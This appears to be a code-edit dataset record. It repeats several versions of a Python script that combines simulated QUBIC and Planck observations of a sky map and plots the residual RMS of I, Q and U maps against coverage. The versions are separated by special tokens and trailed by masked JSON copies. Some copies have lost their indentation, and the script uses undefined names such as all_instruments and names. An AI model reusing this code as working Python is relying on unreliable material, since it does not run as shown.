subplot(3, 1, 3)
yscale('log')
xlabel('Normalized coverage')
ylabel('U RMS residuals')
ylim(0.1, 2)
plot(udata[0], udata[3], color=cols[i], label=names[i], lw=2)
if i == 0:
plot(udata[0], udata[3] * sqrt(2), '--', color=cols[i], label=names
[i] + ' x sqrt(2)', lw=2)
legend(fontsize=fs, loc='upper right')
cols = ['black', 'red', 'blue', 'green', 'orange']
aa = 0.2
rng = [-2, 4]
fs = 8
nb = 20
clf()
for i in xrange(len(all_instruments)):
resid = all_solutions_fusion[i]['x'] - convolved_sky
idata = profile(all_coverages[i][mask] / np.max(all_coverages[i]), np.
nan_to_num(resid[mask, 0]), nbins=nb, range=[0, 1], color=cols[i],
plot=False)
qdata = profile(all_coverages[i][mask] / np.max(all_coverages[i]), np.
nan_to_num(resid[mask, 1]), nbins=nb, range=[0, 1], color=cols[i],
plot=False)
udata = profile(all_coverages[i][mask] / np.max(all_coverages[i]), np.
nan_to_num(resid[mask, 2]), nbins=nb, range=[0, 1], color=cols[i],
plot=False)
if i == 0:
theidata = idata
theqdata = qdata
theudata = udata
subplot(3, 1, 1)
xlabel('Normalized coverage')
ylabel('I RMS residuals ratio \n w.r.t. Full Instrument')
ylim(0.0, 3)
plot(linspace(0, 1, 10), np.zeros(10) + sqrt(2), 'k--')
plot(idata[0], idata[3] / theidata[3], color=cols[i], label=names[i], lw=2)
legend(fontsize=fs, loc='upper right')
subplot(3, 1, 2)
xlabel('Normalized coverage')
ylabel('Q RMS residuals ratio \n w.r.t. Full Instrument')
ylim(0.0, 3)
plot(qdata[0], qdata[3] / theqdata[3], color=cols[i], label=names[i], lw=2)
plot(linspace(0, 1, 10), np.zeros(10) + sqrt(2), 'k--')
legend(fontsize=fs, loc='upper right')
subplot(3, 1, 3)
xlabel('Normalized coverage')
ylabel('U RMS residuals ratio \n w.r.t. Full Instrument')
ylim(0.0, 3)
plot(udata[0], udata[3] / theudata[3], color=cols[i], label=names[i], lw=2)
plot(linspace(0, 1, 10), np.zeros(10) + sqrt(2), 'k--')
legend(fontsize=fs, loc='upper right')
<|reserved_special_token_1|>
from __future__ import division
from pyoperators import pcg
from pysimulators import profile
from qubic import create_random_pointings, equ2gal, QubicAcquisition, PlanckAcquisition, QubicPlanckAcquisition, QubicInstrument
from qubic.data import PATH
from qubic.io import read_map
import healpy as hp
import matplotlib.pyplot as mp
import numpy as np
def statstr(vec):
m = np.mean(vec)
s = np.std(vec)
return '{0:.4f} +/- {1:.4f}'.format(m, s)
def plotinst(inst, shift=0.12):
for xyc, quad in zip(inst.detector.center, inst.detector.quadrant):
if quad < 4:
plot(xyc[0], xyc[1], 'ro')
else:
plot(xyc[0] + shift, xyc[1], 'bo')
xlim(-0.06, 0.18)
def display(input, msg, iplot=1, reso=5, Trange=[100, 5, 5]):
out = []
for i, (kind, lim) in enumerate(zip('IQU', Trange)):
map = input[..., i]
out += [hp.gnomview(map, rot=center, reso=reso, xsize=800, min=-lim,
max=lim, title=msg + ' ' + kind, sub=(3, 3, iplot + i),
return_projected_map=True)]
return out
def profile(x, y, range=None, nbins=10, fmt=None, plot=True, dispersion=
True, color=None):
if range == None:
mini = np.min(x)
maxi = np.max(x)
else:
mini = range[0]
maxi = range[1]
dx = (maxi - mini) / nbins
xmin = np.linspace(mini, maxi - dx, nbins)
xmax = xmin + dx
xc = xmin + dx / 2
yval = np.zeros(nbins)
dy = np.zeros(nbins)
dx = np.zeros(nbins) + dx / 2
for i in np.arange(nbins):
ok = (x > xmin[i]) & (x < xmax[i])
yval[i] = np.mean(y[ok])
if dispersion:
fact = 1
else:
fact = np.sqrt(len(y[ok]))
dy[i] = np.std(y[ok]) / fact
if plot:
errorbar(xc, yval, xerr=dx, yerr=dy, fmt=fmt, color=color)
return xc, yval, dx, dy
nside = 256
racenter = 0.0
deccenter = -57.0
center = equ2gal(racenter, deccenter)
sky = read_map(PATH + 'syn256_pol.fits')
sampling = create_random_pointings([racenter, deccenter], 1000, 10)
all_solutions_fusion = []
all_coverages = []
nbptg = np.linspace(1000, 5000, 5)
correct_time = 365 * 86400.0 / (nbptg / 1000)
detector_nep = 4.7e-17 / np.sqrt(correct_time / len(sampling) * sampling.period
)
for i in xrange(len(all_instruments)):
acq_qubic = QubicAcquisition(150, sampling, nside=nside, detector_nep=
detector_nep[i])
all_coverages.append(acq_qubic.get_coverage())
convolved_sky = acq_qubic.instrument.get_convolution_peak_operator()(sky)
acq_planck = PlanckAcquisition(150, acq_qubic.scene, true_sky=convolved_sky
)
acq_fusion = QubicPlanckAcquisition(acq_qubic, acq_planck)
H = acq_fusion.get_operator()
invntt = acq_fusion.get_invntt_operator()
obs = acq_fusion.get_observation()
A = H.T * invntt * H
b = H.T * invntt * obs
solution_fusion = pcg(A, b, disp=True)
all_solutions_fusion.append(solution_fusion)
mask = all_coverages[0] > np.max(all_coverages[0] / 10)
reso = 3
Trange = [10, 10, 10]
for i in xrange(len(nbptg)):
figure(i)
resid = all_solutions_fusion[i]['x'] - convolved_sky
resid[~mask, :] = 0
display(resid, 'Difference map', iplot=7, reso=reso, Trange=Trange)
print(std(resid[mask, 0]), std(resid[mask, 1]), std(resid[mask, 2]))
cols = ['black', 'red', 'blue', 'green', 'orange']
aa = 0.2
rng = [-2, 4]
fs = 8
nb = 20
clf()
for i in xrange(len(all_instruments)):
resid = all_solutions_fusion[i]['x'] - convolved_sky
idata = profile(all_coverages[i][mask] / np.max(all_coverages[i]), np.
nan_to_num(resid[mask, 0]), nbins=nb, range=[0, 1], color=cols[i],
plot=False)
qdata = profile(all_coverages[i][mask] / np.max(all_coverages[i]), np.
nan_to_num(resid[mask, 1]), nbins=nb, range=[0, 1], color=cols[i],
plot=False)
udata = profile(all_coverages[i][mask] / np.max(all_coverages[i]), np.
nan_to_num(resid[mask, 2]), nbins=nb, range=[0, 1], color=cols[i],
plot=False)
subplot(3, 1, 1)
yscale('log')
xlabel('Normalized coverage')
ylabel('I RMS residuals')
ylim(0.1, 2)
plot(idata[0], idata[3], color=cols[i], label=names[i], lw=2)
if i == 0:
plot(idata[0], idata[3] * sqrt(2), '--', color=cols[i], label=names
[i] + ' x sqrt(2)', lw=2)
legend(fontsize=fs, loc='upper right')
subplot(3, 1, 2)
yscale('log')
xlabel('Normalized coverage')
ylabel('Q RMS residuals')
ylim(0.1, 2)
plot(qdata[0], qdata[3], color=cols[i], label=names[i], lw=2)
if i == 0:
plot(qdata[0], qdata[3] * sqrt(2), '--', color=cols[i], label=names
[i] + ' x sqrt(2)', lw=2)
legend(fontsize=fs, loc='upper right')
subplot(3, 1, 3)
yscale('log')
xlabel('Normalized coverage')
ylabel('U RMS residuals')
ylim(0.1, 2)
plot(udata[0], udata[3], color=cols[i], label=names[i], lw=2)
if i == 0:
plot(udata[0], udata[3] * sqrt(2), '--', color=cols[i], label=names
[i] + ' x sqrt(2)', lw=2)
legend(fontsize=fs, loc='upper right')
cols = ['black', 'red', 'blue', 'green', 'orange']
aa = 0.2
rng = [-2, 4]
fs = 8
nb = 20
clf()
for i in xrange(len(all_instruments)):
resid = all_solutions_fusion[i]['x'] - convolved_sky
idata = profile(all_coverages[i][mask] / np.max(all_coverages[i]), np.
nan_to_num(resid[mask, 0]), nbins=nb, range=[0, 1], color=cols[i],
plot=False)
qdata = profile(all_coverages[i][mask] / np.max(all_coverages[i]), np.
nan_to_num(resid[mask, 1]), nbins=nb, range=[0, 1], color=cols[i],
plot=False)
udata = profile(all_coverages[i][mask] / np.max(all_coverages[i]), np.
nan_to_num(resid[mask, 2]), nbins=nb, range=[0, 1], color=cols[i],
plot=False)
if i == 0:
theidata = idata
theqdata = qdata
theudata = udata
subplot(3, 1, 1)
xlabel('Normalized coverage')
ylabel('I RMS residuals ratio \n w.r.t. Full Instrument')
ylim(0.0, 3)
plot(linspace(0, 1, 10), np.zeros(10) + sqrt(2), 'k--')
plot(idata[0], idata[3] / theidata[3], color=cols[i], label=names[i], lw=2)
legend(fontsize=fs, loc='upper right')
subplot(3, 1, 2)
xlabel('Normalized coverage')
ylabel('Q RMS residuals ratio \n w.r.t. Full Instrument')
ylim(0.0, 3)
plot(qdata[0], qdata[3] / theqdata[3], color=cols[i], label=names[i], lw=2)
plot(linspace(0, 1, 10), np.zeros(10) + sqrt(2), 'k--')
legend(fontsize=fs, loc='upper right')
subplot(3, 1, 3)
xlabel('Normalized coverage')
ylabel('U RMS residuals ratio \n w.r.t. Full Instrument')
ylim(0.0, 3)
plot(udata[0], udata[3] / theudata[3], color=cols[i], label=names[i], lw=2)
plot(linspace(0, 1, 10), np.zeros(10) + sqrt(2), 'k--')
legend(fontsize=fs, loc='upper right')
<|reserved_special_token_1|>
from __future__ import division
from pyoperators import pcg
from pysimulators import profile
from qubic import (
create_random_pointings, equ2gal, QubicAcquisition, PlanckAcquisition,
QubicPlanckAcquisition, QubicInstrument)
from qubic.data import PATH
from qubic.io import read_map
import healpy as hp
import matplotlib.pyplot as mp
import numpy as np
def statstr(vec):
m=np.mean(vec)
s=np.std(vec)
return '{0:.4f} +/- {1:.4f}'.format(m,s)
def plotinst(inst,shift=0.12):
for xyc, quad in zip(inst.detector.center, inst.detector.quadrant):
if quad < 4:
plot(xyc[0],xyc[1],'ro')
else:
plot(xyc[0]+shift,xyc[1],'bo')
xlim(-0.06, 0.18)
def display(input, msg, iplot=1, reso=5, Trange=[100, 5, 5]):
out = []
for i, (kind, lim) in enumerate(zip('IQU', Trange)):
map = input[..., i]
out += [hp.gnomview(map, rot=center, reso=reso, xsize=800, min=-lim,
max=lim, title=msg + ' ' + kind,
sub=(3, 3, iplot + i), return_projected_map=True)]
return out
def profile(x,y,range=None,nbins=10,fmt=None,plot=True, dispersion=True, color=None):
if range == None:
mini = np.min(x)
maxi = np.max(x)
else:
mini = range[0]
maxi = range[1]
dx = (maxi - mini) / nbins
xmin = np.linspace(mini,maxi-dx,nbins)
xmax = xmin + dx
xc = xmin + dx / 2
yval = np.zeros(nbins)
dy = np.zeros(nbins)
dx = np.zeros(nbins) + dx / 2
for i in np.arange(nbins):
ok = (x > xmin[i]) & (x < xmax[i])
yval[i] = np.mean(y[ok])
if dispersion:
fact = 1
else:
fact = np.sqrt(len(y[ok]))
dy[i] = np.std(y[ok])/fact
if plot: errorbar(xc, yval, xerr=dx, yerr=dy, fmt=fmt, color=color)
return xc, yval, dx, dy
nside = 256
racenter = 0.0 # deg
deccenter = -57.0 # deg
center = equ2gal(racenter, deccenter)
sky = read_map(PATH + 'syn256_pol.fits')
sampling = create_random_pointings([racenter, deccenter], 1000, 10)
all_solutions_fusion = []
all_coverages = []
nbptg = np.linspace(1000,5000,5)
correct_time = 365*86400./(nbptg/1000)
detector_nep = 4.7e-17/np.sqrt(correct_time / len(sampling)*sampling.period)
for i in xrange(len(all_instruments)):
acq_qubic = QubicAcquisition(150, sampling, nside=nside,
detector_nep=detector_nep[i])
all_coverages.append(acq_qubic.get_coverage())
convolved_sky = acq_qubic.instrument.get_convolution_peak_operator()(sky)
acq_planck = PlanckAcquisition(150, acq_qubic.scene, true_sky=convolved_sky)
acq_fusion = QubicPlanckAcquisition(acq_qubic, acq_planck)
H = acq_fusion.get_operator()
invntt = acq_fusion.get_invntt_operator()
obs = acq_fusion.get_observation()
A = H.T * invntt * H
b = H.T * invntt * obs
solution_fusion = pcg(A, b, disp=True)
all_solutions_fusion.append(solution_fusion)
mask = all_coverages[0] > np.max(all_coverages[0]/10)
reso=3
Trange=[10, 10, 10]
for i in xrange(len(nbptg)):
figure(i)
resid = all_solutions_fusion[i]['x'] - convolved_sky
resid[~mask,:] = 0
display(resid, 'Difference map', iplot=7, reso=reso, Trange=Trange)
print(std(resid[mask,0]), std(resid[mask,1]), std(resid[mask,2]))
#savefig(names[i]+'.png')
cols=['black', 'red','blue','green', 'orange']
aa=0.2
rng = [-2,4]
fs=8
nb=20
clf()
for i in xrange(len(all_instruments)):
resid = all_solutions_fusion[i]['x'] - convolved_sky
idata = profile(all_coverages[i][mask]/np.max(all_coverages[i]), np.nan_to_num(resid[mask,0]), nbins=nb, range=[0,1],color=cols[i], plot=False)
qdata = profile(all_coverages[i][mask]/np.max(all_coverages[i]), np.nan_to_num(resid[mask,1]), nbins=nb, range=[0,1],color=cols[i], plot=False)
udata = profile(all_coverages[i][mask]/np.max(all_coverages[i]), np.nan_to_num(resid[mask,2]), nbins=nb, range=[0,1],color=cols[i], plot=False)
subplot(3,1,1)
yscale('log')
xlabel('Normalized coverage')
ylabel('I RMS residuals')
ylim(0.1,2)
plot(idata[0], idata[3], color=cols[i], label=names[i], lw=2)
if i==0: plot(idata[0], idata[3]*sqrt(2), '--', color=cols[i], label=names[i]+' x sqrt(2)', lw=2)
legend(fontsize=fs, loc='upper right')
subplot(3,1,2)
yscale('log')
xlabel('Normalized coverage')
ylabel('Q RMS residuals')
ylim(0.1,2)
plot(qdata[0], qdata[3], color=cols[i], label=names[i], lw=2)
if i==0: plot(qdata[0], qdata[3]*sqrt(2), '--', color=cols[i], label=names[i]+' x sqrt(2)', lw=2)
legend(fontsize=fs, loc='upper right')
subplot(3,1,3)
yscale('log')
xlabel('Normalized coverage')
ylabel('U RMS residuals')
ylim(0.1,2)
plot(udata[0], udata[3], color=cols[i], label=names[i], lw=2)
if i==0: plot(udata[0], udata[3]*sqrt(2), '--', color=cols[i], label=names[i]+' x sqrt(2)', lw=2)
legend(fontsize=fs, loc='upper right')
#savefig('rms.png')
cols=['black', 'red','blue','green', 'orange']
aa=0.2
rng = [-2,4]
fs=8
nb=20
clf()
for i in xrange(len(all_instruments)):
resid = all_solutions_fusion[i]['x'] - convolved_sky
idata = profile(all_coverages[i][mask]/np.max(all_coverages[i]), np.nan_to_num(resid[mask,0]), nbins=nb, range=[0,1],color=cols[i], plot=False)
qdata = profile(all_coverages[i][mask]/np.max(all_coverages[i]), np.nan_to_num(resid[mask,1]), nbins=nb, range=[0,1],color=cols[i], plot=False)
udata = profile(all_coverages[i][mask]/np.max(all_coverages[i]), np.nan_to_num(resid[mask,2]), nbins=nb, range=[0,1],color=cols[i], plot=False)
if i == 0 :
theidata = idata
theqdata = qdata
theudata = udata
subplot(3,1,1)
xlabel('Normalized coverage')
ylabel('I RMS residuals ratio \n w.r.t. Full Instrument')
ylim(0.,3)
plot(linspace(0,1,10),np.zeros(10)+sqrt(2), 'k--')
plot(idata[0], idata[3]/theidata[3], color=cols[i], label=names[i], lw=2)
legend(fontsize=fs, loc='upper right')
subplot(3,1,2)
xlabel('Normalized coverage')
ylabel('Q RMS residuals ratio \n w.r.t. Full Instrument')
ylim(0.,3)
plot(qdata[0], qdata[3]/theqdata[3], color=cols[i], label=names[i], lw=2)
plot(linspace(0,1,10),np.zeros(10)+sqrt(2), 'k--')
legend(fontsize=fs, loc='upper right')
subplot(3,1,3)
xlabel('Normalized coverage')
ylabel('U RMS residuals ratio \n w.r.t. Full Instrument')
ylim(0.,3)
plot(udata[0], udata[3]/theudata[3], color=cols[i], label=names[i], lw=2)
plot(linspace(0,1,10),np.zeros(10)+sqrt(2), 'k--')
legend(fontsize=fs, loc='upper right')
#savefig('rms_ratio.png')
|
flexible
|
{
"blob_id": "bcb028bd25732e17ed1478e122ac3b2d1abf2520",
"index": 7931,
"step-1": "<mask token>\n\n\ndef statstr(vec):\n m = np.mean(vec)\n s = np.std(vec)\n return '{0:.4f} +/- {1:.4f}'.format(m, s)\n\n\ndef plotinst(inst, shift=0.12):\n for xyc, quad in zip(inst.detector.center, inst.detector.quadrant):\n if quad < 4:\n plot(xyc[0], xyc[1], 'ro')\n else:\n plot(xyc[0] + shift, xyc[1], 'bo')\n xlim(-0.06, 0.18)\n\n\ndef display(input, msg, iplot=1, reso=5, Trange=[100, 5, 5]):\n out = []\n for i, (kind, lim) in enumerate(zip('IQU', Trange)):\n map = input[..., i]\n out += [hp.gnomview(map, rot=center, reso=reso, xsize=800, min=-lim,\n max=lim, title=msg + ' ' + kind, sub=(3, 3, iplot + i),\n return_projected_map=True)]\n return out\n\n\ndef profile(x, y, range=None, nbins=10, fmt=None, plot=True, dispersion=\n True, color=None):\n if range == None:\n mini = np.min(x)\n maxi = np.max(x)\n else:\n mini = range[0]\n maxi = range[1]\n dx = (maxi - mini) / nbins\n xmin = np.linspace(mini, maxi - dx, nbins)\n xmax = xmin + dx\n xc = xmin + dx / 2\n yval = np.zeros(nbins)\n dy = np.zeros(nbins)\n dx = np.zeros(nbins) + dx / 2\n for i in np.arange(nbins):\n ok = (x > xmin[i]) & (x < xmax[i])\n yval[i] = np.mean(y[ok])\n if dispersion:\n fact = 1\n else:\n fact = np.sqrt(len(y[ok]))\n dy[i] = np.std(y[ok]) / fact\n if plot:\n errorbar(xc, yval, xerr=dx, yerr=dy, fmt=fmt, color=color)\n return xc, yval, dx, dy\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef statstr(vec):\n m = np.mean(vec)\n s = np.std(vec)\n return '{0:.4f} +/- {1:.4f}'.format(m, s)\n\n\ndef plotinst(inst, shift=0.12):\n for xyc, quad in zip(inst.detector.center, inst.detector.quadrant):\n if quad < 4:\n plot(xyc[0], xyc[1], 'ro')\n else:\n plot(xyc[0] + shift, xyc[1], 'bo')\n xlim(-0.06, 0.18)\n\n\ndef display(input, msg, iplot=1, reso=5, Trange=[100, 5, 5]):\n out = []\n for i, (kind, lim) in enumerate(zip('IQU', Trange)):\n map = input[..., i]\n out += [hp.gnomview(map, rot=center, reso=reso, xsize=800, min=-lim,\n max=lim, title=msg + ' ' + kind, sub=(3, 3, iplot + i),\n return_projected_map=True)]\n return out\n\n\ndef profile(x, y, range=None, nbins=10, fmt=None, plot=True, dispersion=\n True, color=None):\n if range == None:\n mini = np.min(x)\n maxi = np.max(x)\n else:\n mini = range[0]\n maxi = range[1]\n dx = (maxi - mini) / nbins\n xmin = np.linspace(mini, maxi - dx, nbins)\n xmax = xmin + dx\n xc = xmin + dx / 2\n yval = np.zeros(nbins)\n dy = np.zeros(nbins)\n dx = np.zeros(nbins) + dx / 2\n for i in np.arange(nbins):\n ok = (x > xmin[i]) & (x < xmax[i])\n yval[i] = np.mean(y[ok])\n if dispersion:\n fact = 1\n else:\n fact = np.sqrt(len(y[ok]))\n dy[i] = np.std(y[ok]) / fact\n if plot:\n errorbar(xc, yval, xerr=dx, yerr=dy, fmt=fmt, color=color)\n return xc, yval, dx, dy\n\n\n<mask token>\nfor i in xrange(len(all_instruments)):\n acq_qubic = QubicAcquisition(150, sampling, nside=nside, detector_nep=\n detector_nep[i])\n all_coverages.append(acq_qubic.get_coverage())\n convolved_sky = acq_qubic.instrument.get_convolution_peak_operator()(sky)\n acq_planck = PlanckAcquisition(150, acq_qubic.scene, true_sky=convolved_sky\n )\n acq_fusion = QubicPlanckAcquisition(acq_qubic, acq_planck)\n H = acq_fusion.get_operator()\n invntt = acq_fusion.get_invntt_operator()\n obs = acq_fusion.get_observation()\n A = H.T * invntt * H\n b = H.T * invntt * obs\n solution_fusion = pcg(A, b, disp=True)\n all_solutions_fusion.append(solution_fusion)\n<mask token>\nfor i in xrange(len(nbptg)):\n figure(i)\n resid = all_solutions_fusion[i]['x'] - convolved_sky\n resid[~mask, :] = 0\n display(resid, 'Difference map', iplot=7, reso=reso, Trange=Trange)\n print(std(resid[mask, 0]), std(resid[mask, 1]), std(resid[mask, 2]))\n<mask token>\nclf()\nfor i in xrange(len(all_instruments)):\n resid = all_solutions_fusion[i]['x'] - convolved_sky\n idata = profile(all_coverages[i][mask] / np.max(all_coverages[i]), np.\n nan_to_num(resid[mask, 0]), nbins=nb, range=[0, 1], color=cols[i],\n plot=False)\n qdata = profile(all_coverages[i][mask] / np.max(all_coverages[i]), np.\n nan_to_num(resid[mask, 1]), nbins=nb, range=[0, 1], color=cols[i],\n plot=False)\n udata = profile(all_coverages[i][mask] / np.max(all_coverages[i]), np.\n nan_to_num(resid[mask, 2]), nbins=nb, range=[0, 1], color=cols[i],\n plot=False)\n subplot(3, 1, 1)\n yscale('log')\n xlabel('Normalized coverage')\n ylabel('I RMS residuals')\n ylim(0.1, 2)\n plot(idata[0], idata[3], color=cols[i], label=names[i], lw=2)\n if i == 0:\n plot(idata[0], idata[3] * sqrt(2), '--', color=cols[i], label=names\n [i] + ' x sqrt(2)', lw=2)\n legend(fontsize=fs, loc='upper right')\n subplot(3, 1, 2)\n yscale('log')\n xlabel('Normalized coverage')\n ylabel('Q RMS residuals')\n ylim(0.1, 2)\n plot(qdata[0], qdata[3], color=cols[i], label=names[i], lw=2)\n if i == 0:\n plot(qdata[0], qdata[3] * sqrt(2), '--', color=cols[i], label=names\n [i] + ' x sqrt(2)', lw=2)\n legend(fontsize=fs, loc='upper right')\n subplot(3, 1, 3)\n yscale('log')\n xlabel('Normalized coverage')\n ylabel('U RMS residuals')\n ylim(0.1, 2)\n plot(udata[0], udata[3], color=cols[i], label=names[i], lw=2)\n if i == 0:\n plot(udata[0], udata[3] * sqrt(2), '--', color=cols[i], label=names\n [i] + ' x sqrt(2)', lw=2)\n legend(fontsize=fs, loc='upper right')\n<mask token>\nclf()\nfor i in xrange(len(all_instruments)):\n resid = all_solutions_fusion[i]['x'] - convolved_sky\n idata = profile(all_coverages[i][mask] / np.max(all_coverages[i]), np.\n nan_to_num(resid[mask, 0]), nbins=nb, range=[0, 1], color=cols[i],\n plot=False)\n qdata = profile(all_coverages[i][mask] / np.max(all_coverages[i]), np.\n nan_to_num(resid[mask, 1]), nbins=nb, range=[0, 1], color=cols[i],\n plot=False)\n udata = profile(all_coverages[i][mask] / np.max(all_coverages[i]), np.\n nan_to_num(resid[mask, 2]), nbins=nb, range=[0, 1], color=cols[i],\n plot=False)\n if i == 0:\n theidata = idata\n theqdata = qdata\n theudata = udata\n subplot(3, 1, 1)\n xlabel('Normalized coverage')\n ylabel('I RMS residuals ratio \\n w.r.t. Full Instrument')\n ylim(0.0, 3)\n plot(linspace(0, 1, 10), np.zeros(10) + sqrt(2), 'k--')\n plot(idata[0], idata[3] / theidata[3], color=cols[i], label=names[i], lw=2)\n legend(fontsize=fs, loc='upper right')\n subplot(3, 1, 2)\n xlabel('Normalized coverage')\n ylabel('Q RMS residuals ratio \\n w.r.t. Full Instrument')\n ylim(0.0, 3)\n plot(qdata[0], qdata[3] / theqdata[3], color=cols[i], label=names[i], lw=2)\n plot(linspace(0, 1, 10), np.zeros(10) + sqrt(2), 'k--')\n legend(fontsize=fs, loc='upper right')\n subplot(3, 1, 3)\n xlabel('Normalized coverage')\n ylabel('U RMS residuals ratio \\n w.r.t. Full Instrument')\n ylim(0.0, 3)\n plot(udata[0], udata[3] / theudata[3], color=cols[i], label=names[i], lw=2)\n plot(linspace(0, 1, 10), np.zeros(10) + sqrt(2), 'k--')\n legend(fontsize=fs, loc='upper right')\n",
"step-3": "<mask token>\n\n\ndef statstr(vec):\n m = np.mean(vec)\n s = np.std(vec)\n return '{0:.4f} +/- {1:.4f}'.format(m, s)\n\n\ndef plotinst(inst, shift=0.12):\n for xyc, quad in zip(inst.detector.center, inst.detector.quadrant):\n if quad < 4:\n plot(xyc[0], xyc[1], 'ro')\n else:\n plot(xyc[0] + shift, xyc[1], 'bo')\n xlim(-0.06, 0.18)\n\n\ndef display(input, msg, iplot=1, reso=5, Trange=[100, 5, 5]):\n out = []\n for i, (kind, lim) in enumerate(zip('IQU', Trange)):\n map = input[..., i]\n out += [hp.gnomview(map, rot=center, reso=reso, xsize=800, min=-lim,\n max=lim, title=msg + ' ' + kind, sub=(3, 3, iplot + i),\n return_projected_map=True)]\n return out\n\n\ndef profile(x, y, range=None, nbins=10, fmt=None, plot=True, dispersion=\n True, color=None):\n if range == None:\n mini = np.min(x)\n maxi = np.max(x)\n else:\n mini = range[0]\n maxi = range[1]\n dx = (maxi - mini) / nbins\n xmin = np.linspace(mini, maxi - dx, nbins)\n xmax = xmin + dx\n xc = xmin + dx / 2\n yval = np.zeros(nbins)\n dy = np.zeros(nbins)\n dx = np.zeros(nbins) + dx / 2\n for i in np.arange(nbins):\n ok = (x > xmin[i]) & (x < xmax[i])\n yval[i] = np.mean(y[ok])\n if dispersion:\n fact = 1\n else:\n fact = np.sqrt(len(y[ok]))\n dy[i] = np.std(y[ok]) / fact\n if plot:\n errorbar(xc, yval, xerr=dx, yerr=dy, fmt=fmt, color=color)\n return xc, yval, dx, dy\n\n\nnside = 256\nracenter = 0.0\ndeccenter = -57.0\ncenter = equ2gal(racenter, deccenter)\nsky = read_map(PATH + 'syn256_pol.fits')\nsampling = create_random_pointings([racenter, deccenter], 1000, 10)\nall_solutions_fusion = []\nall_coverages = []\nnbptg = np.linspace(1000, 5000, 5)\ncorrect_time = 365 * 86400.0 / (nbptg / 1000)\ndetector_nep = 4.7e-17 / np.sqrt(correct_time / len(sampling) * sampling.period\n )\nfor i in xrange(len(all_instruments)):\n acq_qubic = QubicAcquisition(150, sampling, nside=nside, detector_nep=\n detector_nep[i])\n all_coverages.append(acq_qubic.get_coverage())\n convolved_sky = acq_qubic.instrument.get_convolution_peak_operator()(sky)\n acq_planck = PlanckAcquisition(150, acq_qubic.scene, true_sky=convolved_sky\n )\n acq_fusion = QubicPlanckAcquisition(acq_qubic, acq_planck)\n H = acq_fusion.get_operator()\n invntt = acq_fusion.get_invntt_operator()\n obs = acq_fusion.get_observation()\n A = H.T * invntt * H\n b = H.T * invntt * obs\n solution_fusion = pcg(A, b, disp=True)\n all_solutions_fusion.append(solution_fusion)\nmask = all_coverages[0] > np.max(all_coverages[0] / 10)\nreso = 3\nTrange = [10, 10, 10]\nfor i in xrange(len(nbptg)):\n figure(i)\n resid = all_solutions_fusion[i]['x'] - convolved_sky\n resid[~mask, :] = 0\n display(resid, 'Difference map', iplot=7, reso=reso, Trange=Trange)\n print(std(resid[mask, 0]), std(resid[mask, 1]), std(resid[mask, 2]))\ncols = ['black', 'red', 'blue', 'green', 'orange']\naa = 0.2\nrng = [-2, 4]\nfs = 8\nnb = 20\nclf()\nfor i in xrange(len(all_instruments)):\n resid = all_solutions_fusion[i]['x'] - convolved_sky\n idata = profile(all_coverages[i][mask] / np.max(all_coverages[i]), np.\n nan_to_num(resid[mask, 0]), nbins=nb, range=[0, 1], color=cols[i],\n plot=False)\n qdata = profile(all_coverages[i][mask] / np.max(all_coverages[i]), np.\n nan_to_num(resid[mask, 1]), nbins=nb, range=[0, 1], color=cols[i],\n plot=False)\n udata = profile(all_coverages[i][mask] / np.max(all_coverages[i]), np.\n nan_to_num(resid[mask, 2]), nbins=nb, range=[0, 1], color=cols[i],\n plot=False)\n subplot(3, 1, 1)\n yscale('log')\n xlabel('Normalized coverage')\n ylabel('I RMS residuals')\n ylim(0.1, 2)\n plot(idata[0], idata[3], color=cols[i], label=names[i], lw=2)\n if i == 0:\n plot(idata[0], idata[3] * sqrt(2), '--', color=cols[i], label=names\n [i] + ' x sqrt(2)', lw=2)\n legend(fontsize=fs, loc='upper right')\n subplot(3, 1, 2)\n yscale('log')\n xlabel('Normalized coverage')\n ylabel('Q RMS residuals')\n ylim(0.1, 2)\n plot(qdata[0], qdata[3], color=cols[i], label=names[i], lw=2)\n if i == 0:\n plot(qdata[0], qdata[3] * sqrt(2), '--', color=cols[i], label=names\n [i] + ' x sqrt(2)', lw=2)\n legend(fontsize=fs, loc='upper right')\n subplot(3, 1, 3)\n yscale('log')\n xlabel('Normalized coverage')\n ylabel('U RMS residuals')\n ylim(0.1, 2)\n plot(udata[0], udata[3], color=cols[i], label=names[i], lw=2)\n if i == 0:\n plot(udata[0], udata[3] * sqrt(2), '--', color=cols[i], label=names\n [i] + ' x sqrt(2)', lw=2)\n legend(fontsize=fs, loc='upper right')\ncols = ['black', 'red', 'blue', 'green', 'orange']\naa = 0.2\nrng = [-2, 4]\nfs = 8\nnb = 20\nclf()\nfor i in xrange(len(all_instruments)):\n resid = all_solutions_fusion[i]['x'] - convolved_sky\n idata = profile(all_coverages[i][mask] / np.max(all_coverages[i]), np.\n nan_to_num(resid[mask, 0]), nbins=nb, range=[0, 1], color=cols[i],\n plot=False)\n qdata = profile(all_coverages[i][mask] / np.max(all_coverages[i]), np.\n nan_to_num(resid[mask, 1]), nbins=nb, range=[0, 1], color=cols[i],\n plot=False)\n udata = profile(all_coverages[i][mask] / np.max(all_coverages[i]), np.\n nan_to_num(resid[mask, 2]), nbins=nb, range=[0, 1], color=cols[i],\n plot=False)\n if i == 0:\n theidata = idata\n theqdata = qdata\n theudata = udata\n subplot(3, 1, 1)\n xlabel('Normalized coverage')\n ylabel('I RMS residuals ratio \\n w.r.t. Full Instrument')\n ylim(0.0, 3)\n plot(linspace(0, 1, 10), np.zeros(10) + sqrt(2), 'k--')\n plot(idata[0], idata[3] / theidata[3], color=cols[i], label=names[i], lw=2)\n legend(fontsize=fs, loc='upper right')\n subplot(3, 1, 2)\n xlabel('Normalized coverage')\n ylabel('Q RMS residuals ratio \\n w.r.t. Full Instrument')\n ylim(0.0, 3)\n plot(qdata[0], qdata[3] / theqdata[3], color=cols[i], label=names[i], lw=2)\n plot(linspace(0, 1, 10), np.zeros(10) + sqrt(2), 'k--')\n legend(fontsize=fs, loc='upper right')\n subplot(3, 1, 3)\n xlabel('Normalized coverage')\n ylabel('U RMS residuals ratio \\n w.r.t. Full Instrument')\n ylim(0.0, 3)\n plot(udata[0], udata[3] / theudata[3], color=cols[i], label=names[i], lw=2)\n plot(linspace(0, 1, 10), np.zeros(10) + sqrt(2), 'k--')\n legend(fontsize=fs, loc='upper right')\n",
